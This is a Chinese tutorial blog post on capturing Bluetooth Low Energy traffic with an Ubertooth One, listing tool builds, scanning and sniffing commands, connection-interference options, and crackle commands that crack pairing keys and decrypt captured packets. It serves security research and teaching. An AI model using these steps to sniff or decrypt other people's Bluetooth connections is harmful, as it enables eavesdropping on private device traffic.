深入浅出低功耗蓝牙(BLE)协议栈(实战篇)
环境搭建
上面介绍了数据包和各层协议,接下来我们将使用Ubertooth One来捕获通信过程中的蓝牙数据包。
(1)安装lib库
apt-get install python-software-properties
add-apt-repository ppa:pyside
apt-get update
apt-get install libnl-dev libusb-1.0-0-dev pyside-tools(2)安装libbtbb
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-09-R2.tar.gz -O libbtbb-2015-09-R2.tar.gz
tar xf libbtbb-2015-09-R2.tar.gz
cd libbtbb-2015-09-R2
mkdir build
cd build
cmake ..
make
sudo make install(3)安装ubertooth
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-09-R2/ubertooth-2015-09-R2.tar.xz -O ubertooth-2015-09-R2.tar.xz
tar xf ubertooth-2015-09-R2.tar.xz
cd ubertooth-2015-09-R2/host
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig(4)安装wireshark
sudo apt-get install checkinstallwget https://www.wireshark.org/download/src/wireshark-2.0.3.tar.bz2tar -xvf wireshark-2.0.3.tar.bz2cd wireshark-2.0.3./configuremakemake install(5)安装kismet
wget https://kismetwireless.net/code/kismet-2013-03-R1b.tar.xz
tar xf kismet-2013-03-R1b.tar.xz
cd kismet-2013-03-R1b
ln -s ../ubertooth-2015-09-R2/host/kismet/plugin-ubertooth .
./configure
make && make plugins
sudo make suidinstall
sudo make plugins-install(6)安装BLE解密工具crackle
crackle (开源项目地址)
git clone https://github.com/mikeryan/crackle.git
cd crackle
make
make install找到kismet的配置文件kismet.conf ,把”pcapbtbb”加入到kismet.conf的logtypes= 里边
嗅探扫描
(1)spectool
spectool_curses
spectool_gtk扫描附近信号并在频谱上显示:
spectool_rawRAW中文解释是“原材料”或“未经处理的东西”,这里猜测是显示设备捕获到的未经处理的信号数据:
spectool_net将Ubertooth One作为一台“硬件服务器”,并监听TCP:30569端口,局域网内任何可以跟主机建立通信的PC可通过Ubertoothe主机IP+30569共享设备。连接方式:在另外一台主机终端上执行:spectool_gtk
—>选择Open Network Device —>输入ip、端口。
(2)hcitool
root@0xroot:~# hcitool --help
hcitool - HCI Tool ver 4.99
Usage:
hcitool [options] <command> [command parameters]
Options:
--help Display help
-i dev HCI device
Commands:
dev Display local devices
inq Inquire remote devices
scan Scan for remote devices
name Get name from remote device
info Get information from remote device
spinq Start periodic inquiry
epinq Exit periodic inquiry
cmd Submit arbitrary HCI commands
con Display active connections
cc Create connection to remote device
dc Disconnect from remote device
sr Switch master/slave role
cpt Change connection packet type
rssi Display connection RSSI
lq Display link quality
tpl Display transmit power level
afh Display AFH channel map
lp Set/display link policy settings
lst Set/display link supervision timeout
auth Request authentication
enc Set connection encryption
key Change connection link key
clkoff Read clock offset
clock Read local or remote clock
lescan Start LE scan
lewladd Add device to LE White List
lewlrm Remove device from LE White List
lewlsz Read size of LE White List
lewlclr Clear LE White list
lecc Create a LE Connection
ledc Disconnect a LE Connection
lecup LE Connection Updatehcitool scan :扫描附近蓝牙设备
hcitool lescan :扫描附近低功耗蓝牙设备
(3)gatttool
root@0xroot:~# gatttool -h
Usage:
gatttool [OPTION...]
Help Options:
-h, --help Show help options
--help-all Show all help options
--help-gatt Show all GATT commands
--help-params Show all Primary Services/Characteristics arguments
--help-char-read-write Show all Characteristics Value/Descriptor Read/Write arguments
Application Options:
-i, --adapter=hciX Specify local adapter interface
-b, --device=MAC Specify remote Bluetooth address
-m, --mtu=MTU Specify the MTU size
-p, --psm=PSM Specify the PSM for GATT/ATT over BR/EDR
-l, --sec-level=[low | medium | high] Set security level. Default: low
-I, --interactive Use interactive modegatttool -b 1C:96:5A:FF:4B:E7 -I
[ ][1C:96:5A:FF:4B:E7][LE]> help
help Show this help
exit Exit interactive mode
quit Exit interactive mode
connect [address] Connect to a remote device
disconnect Disconnect from a remote device
primary [UUID] Primary Service Discovery
characteristics [start hnd [end hnd [UUID]]] Characteristics Discovery
char-desc [start hnd] [end hnd] Characteristics Descriptor Discovery
char-read-hnd <handle> [offset] Characteristics Value/Descriptor Read by handle
char-read-uuid <UUID> [start hnd] [end hnd] Characteristics Value/Descriptor Read by UUID
char-write-req <handle> <new value> Characteristic Value Write (Write Request)
char-write-cmd <handle> <new value> Characteristic Value Write (No response)
sec-level [low | medium | high] Set security level. Default: low
mtu <value> Exchange MTU for GATT/ATT
[ ][1C:96:5A:FF:4B:E7][LE]>(4)ubertooth-scan
root@0xroot:~# ubertooth-scan --help
ubertooth-scan: invalid option -- '-'
ubertooth-scan - active(bluez) device scan and inquiry supported by Ubertooth
Usage:
-h this Help
-U<0-7> set ubertooth device to use
-s hci Scan - perform HCI scan
-t scan Time (seconds) - length of time to sniff packets. [Default: 20s]
-x eXtended scan - retrieve additional information about target devices
-b Bluetooth device (hci0)ubertooth-scan -s
(5)ubertooth-btle
ubertooth-btle - passive Bluetooth Low Energy monitoring
Usage:
-h this help
Major modes:
-f follow connections
-p promiscuous: sniff active connections
-a[address] get/set access address (example: -a8e89bed6)
-s<address> faux slave mode, using MAC addr (example: -s22:44:66:88:aa:cc)
-t<address> set connection following target (example: -t22:44:66:88:aa:cc)
Interference (use with -f or -p):
-i interfere with one connection and return to idle
-I interfere continuously
Data source:
-U<0-7> set ubertooth device to use
Misc:
-r<filename> capture packets to PCAPNG file
-q<filename> capture packets to PCAP file (DLT_BLUETOOTH_LE_LL_WITH_PHDR)
-c<filename> capture packets to PCAP file (DLT_PPI)
-A<index> advertising channel index (default 37)
-v[01] verify CRC mode, get status or enable/disable
-x<n> allow n access address offenses (default 32)
If an input file is not specified, an Ubertooth device is used for live capture.
In get/set mode no capture occurs.ubertooth-btle -f -ctest.pcap抓包&保存到本地
使用这条命令我们可以把设备捕获到的数据包保存到本地,完成后可导入wireshark进行数据包、协议分析。
wireshark导入嗅探到的蓝牙数据包需要处理一下才能正常查看,不然无法正常分析数据:
Edit → Preferences → Protocols → DLT_USER → Edit → New
在payload protocol中输入btle
使用规则过滤数据包:参考Capturing BLE in Wireshark
btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05
(6)crackle
如果捕获到足够的数据包尤其是btsmp,那接下来便可以用crackle来破解tk和ltk:
crackle -i <file.pcap>解密数据包,并把解密后的包另存:
crackle -i <file.pcap> -o <output.pcap>
crackle -i <file.pcap> -o <out.pcap> -l <ltk>参考 & 感谢
参考书:Robin Heydon. Bluetooth Low Energy the Developer’s Handbook 《低功耗蓝牙开发权威指南》,网盘密码迈微AI研习社公众号回复“8001” 链接:https://pan.baidu.com/s/1xneDTzdejtA91go5YuDhnQ Sniffing and decoding NRF24L01+ and Bluetooth LE packets for under $30 Bluetooth sniffing with Ubertooth :https://dominicspill.com/kiwicon/Spill-Ubertooth-Kiwicon-2012.pdf Now I wanna sniff some Bluetooth: Sniffing and Cracking Bluetooth with the UbertoothOne http://j2abro.blogspot.com.au/2014/06/understanding-bluetooth-advertising.html 路人甲@乌云drops:Bluetooth Low Energy 嗅探 疯狗@乌云drops:物联网安全拔“牙”实战——低功耗蓝牙(BLE)初探 http://j2abro.blogspot.com.au/2014/06/understanding-bluetooth-advertising.html http://j2abro.blogspot.com.au/2014/06/analyzing-bluetooth-advertising-with.html http://cerescontrols.com/tutorials-3/sniffing-bluetooth-packets-with-kismet-and-wireshark-in-ubuntu-12-04/ https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide https://github.com/greatscottgadgets/ubertooth/wiki/Capturing-BLE-in-Wireshark http://stackoverflow.com/questions/23877761/sniffing-logging-your-own-android-bluetooth-traffic https://lacklustre.net/bluetooth/wireshark.html https://blog.lacklustre.net/posts/BLE_Fun_With_Ubertooth:_Sniffing_Bluetooth_Smart_and_Cracking_Its_Crypto/ http://superuser.com/questions/947593/how-can-i-sniff-bluetooth-traffic-coming-from-my-and-another-device http://www.backtrack-linux.org/forums/showthread.php?t=41552 http://www.splitbits.com/2014/05/14/ubertooth-spectools-chromebook/ http://ubertooth.sourceforge.net/usage/start/ http://hackerific.net/2012/01/28/Spectrum-Tools-and-Ubertooth-One/ https://penturalabs.wordpress.com/2014/02/20/ubertooth-updated-for-2014/ https://blog.lacklustre.net/
腾讯云开发者
